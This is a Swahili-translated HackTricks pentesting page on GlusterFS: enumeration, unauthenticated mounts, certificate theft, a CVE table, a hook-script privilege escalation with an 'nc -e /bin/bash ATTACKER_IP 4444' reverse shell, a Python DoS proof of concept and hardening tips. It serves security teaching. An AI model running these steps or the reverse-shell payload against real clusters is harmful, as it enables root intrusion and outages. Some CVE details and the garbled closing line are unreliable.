maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md

4.9 KiB
Raw Blame History

24007-24008-24009-49152 - Pentesting GlusterFS

{{#include ../banners/hacktricks-training.md}}

Basic Information

GlusterFS ni mfumo wa faili ulio sambazwa ambao unachanganya uhifadhi kutoka kwa seva nyingi katika jina moja lililounganishwa. Daemon ya usimamizi (glusterd) inasikiliza kwa default kwenye 24007/TCP na inaagiza bricks za data-plane ambazo huanza kwenye 49152/TCP (bandari moja kwa brick, ikiongezeka). Matoleo kabla ya 9.x yalitumia 2400824009/TCP kwa usafirishaji wa brick, hivyo bado utaona bandari hizo katika makundi ya urithi.

PORT      STATE  SERVICE        VERSION
24007/tcp open   glusterd       GlusterFS (RPC)
49152/tcp open   gluster-brick  SSL (TLS optional)

Kidokezo: 24007 inajibu simu za RPC hata wakati nodi za kuhifadhi pekee hazitoi kiasi chochote; kwa hivyo huduma hii ni lengo la kuaminika ndani ya miundombinu mikubwa.

Uhesabu

Sakinisha zana za mteja kwenye sanduku lako la shambulio:

sudo apt install -y glusterfs-cli glusterfs-client   # Debian/Ubuntu
  1. Ugunduzi wa wenzangu & afya
# List peers (works without authentication in default setups)
gluster --remote-host 10.10.11.131 peer status
  1. Upelelezi wa kiasi
# Retrieve the list of all volumes and their configuration
gluster --remote-host 10.10.11.131 volume info all
  1. Kuweka bila ruhusa
sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/gluster

Ikiwa usakinishaji unashindwa, angalia /var/log/glusterfs/<vol_name>-<uid>.log upande wa mteja. Masuala ya kawaida ni:

  • TLS enforcement (option transport.socket.ssl on)
  • Address based access control (option auth.allow <cidr>)

Ukarabati wa cheti

Pora faili zifuatazo kutoka kwa nodi yoyote ya mteja iliyoidhinishwa na uweke katika /etc/ssl/ (au saraka iliyoonyeshwa katika kumbukumbu ya makosa):

/etc/ssl/glusterfs.pem
/etc/ssl/glusterfs.key
/etc/ssl/glusterfs.ca

Uthibitisho wa Uthibitisho (2022-2025)

CVE Matoleo yaliyoathiriwa Athari Maelezo
CVE-2022-48340 10.010.4, 11.0 Tumia-baada-ya-kuachia katika dht_setxattr_mds_cbk inayoweza kufikiwa kupitia mtandao DoS ya mbali na uwezekano wa RCE. Imerekebishwa katika 10.4.1 / 11.1.
CVE-2023-26253 < 11.0 Kusoma nje ya mipaka katika FUSE notify handler Kuanguka kwa mbali kupitia operesheni za FS zilizoundwa; PoC ya umma inapatikana.
CVE-2023-3775 < 10.5 / 11.1 Uthibitisho usio sahihi wa ruhusa wakati wa kupandisha gluster_shared_storage Inaruhusu mteja yeyote asiye na uthibitisho kupandisha kiasi cha admin inasababisha priv-esc iliyoelezewa hapa chini.

Daima angalia gluster --version katika kila node; makundi tofauti ni ya kawaida baada ya sasisho za sehemu.

Kutumia gluster_shared_storage (Kuongeza Haki)

Hata katika matoleo ya hivi karibuni, wasimamizi wengi wanaacha kiasi maalum cha gluster_shared_storage kuwa na uwezo wa kusomeka na kila mtu kwa sababu inarahisisha geo-replication. Kiasi hiki kina templates za cronjob ambazo zinafanya kazi na root katika kila node.

# 1. Mount admin volume anonymously
mkdir /tmp/gss && sudo mount -t glusterfs 10.10.11.131:/gluster_shared_storage /tmp/gss

# 2. Drop malicious script that gets synchronised cluster-wide
cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh
#!/bin/bash
nc -e /bin/bash ATTACKER_IP 4444 &
EOF
chmod +x /tmp/gss/hooks/1/start/post/test.sh

# 3. Wait until glusterd distributes the hook and executes it as root

Ikiwa hooks/1/ haipo, angalia /ss_bricks/ njia halisi inaweza kutofautiana na toleo kuu.

Denial-of-Service PoC (CVE-2023-26253)

#!/usr/bin/env python3
# Minimal reproducer: sends malformed NOTIFY_REPLY XDR frame to 24007
import socket, xdrlib, struct
p = xdrlib.Packer(); p.pack_uint(0xdeadbeef)
with socket.create_connection(("10.10.11.131",24007)) as s:
s.send(struct.pack("!L", len(p.get_buffer())|0x80000000))
s.send(p.get_buffer())

Kukimbia kwa script kunasababisha glusterfsd < 11.0.

Kuimarisha & Ugunduzi

  • Sasisha LTS ya sasa ni 11.1 (Julai 2025). CVE zote zilizo juu zimefanyiwa marekebisho.
  • Wezesha TLS kwa kila brick:
gluster volume set <vol> transport.socket.ssl on
gluster volume set <vol> transport.socket.ssl-cert /etc/ssl/glusterfs.pem
  • Punguza wateja kwa orodha za CIDR:
gluster volume set <vol> auth.allow 10.0.0.0/24
  • Funua bandari ya usimamizi 24007 tu kwenye VLAN ya kibinafsi au kupitia SSH tunnels.
  • Angalia kumbukumbu: tail -f /var/log/glusterfs/glusterd.log na konfigura kipengele cha audit-log (volume set <vol> features.audit-log on).

Marejeleo